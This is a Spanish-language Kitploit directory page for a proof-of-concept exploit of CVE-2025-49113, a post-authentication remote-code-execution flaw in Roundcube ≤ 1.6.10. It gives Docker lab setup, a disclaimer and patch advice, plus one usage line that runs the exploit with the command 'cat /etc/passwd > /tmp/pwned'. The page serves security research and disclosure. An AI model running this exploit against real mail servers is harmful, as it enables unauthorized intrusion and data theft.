Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-49113 — Exploit RCE post-autenticación para Roundcube ≤ 1.6.10 mediante deserialización de objetos PHP, con configuración de laboratorio basado en Docker y documentación técnica para investigación y educación en seguridad. | Kitploit
Herramientas/GitHubGitHub/fearsoff-org/cve-2025-49113
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubfearsoff-org/cve-2025-49113

CVE-2025-49113

Exploit RCE post-autenticación para Roundcube ≤ 1.6.10 mediante deserialización de objetos PHP, con configuración de laboratorio basado en Docker y documentación técnica para investigación y educación en seguridad.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
10823hace 1 añoRevisado por Kitploit

📧 Roundcube ≤ 1.6.10 RCE post-autenticación mediante deserialización de objetos PHP [CVE-2025-49113]

🔍 Informe técnico

Se descubrió una vulnerabilidad crítica de ejecución remota de código (RCE) posterior a la autenticación en Roundcube (versiones ≤ 1.6.10), causada por una deserialización insegura de objetos PHP. Esta grave falla ha persistido silenciosamente en el código base durante más de 10 años.

Para el informe técnico completo y los detalles de explotación, visite:

👉 https://fearsoff.org/research/roundcube


🐳 Instalación rápida (mediante Docker)

Esto instalará Ubuntu 24.04, Roundcube y todas las dependencias necesarias dentro de un contenedor Docker:

root@kitploit:~
docker run --name ubuntu24 \
  -p 9876:80 \
  -v "$PWD/rc_install.sh":/root/rc_install.sh \
  -it ubuntu:24.04 \
  bash -c "chmod +x /root/rc_install.sh && /root/rc_install.sh && exec bash"

⚠️ Nota: Utilícelo solo en entornos aislados. No exponga instancias vulnerables a Internet público.

⚠️ Descargo de responsabilidad

Este código de prueba de concepto se proporciona únicamente con fines educativos y de investigación. El autor y los colaboradores no asumen ninguna responsabilidad por cualquier uso indebido o daño resultante del uso de este código. El uso no autorizado en sistemas que no posea o para los que no tenga permiso explícito para realizar pruebas es ilegal y está estrictamente prohibido.

Ejecutar:

Asegúrese de tener php instalado en el sistema

root@kitploit:~
php CVE-2025-49113.php http://127.0.0.1:9876/ roundcube fearsoff.org "cat /etc/passwd > /tmp/pwned"

👤 Autor y créditos

  • Autor: Kirill Firsov (https://x.com/k_firsov)
  • Organización: FearsOff (https://fearsoff.org)

🛡️ Mitigación

Si está ejecutando Roundcube ≤ 1.6.10, actualice inmediatamente a la última versión parcheada para eliminar esta vulnerabilidad.


📜 Licencia

Este proyecto y la documentación asociada se proporcionan bajo la licencia MIT.

Descargar herramienta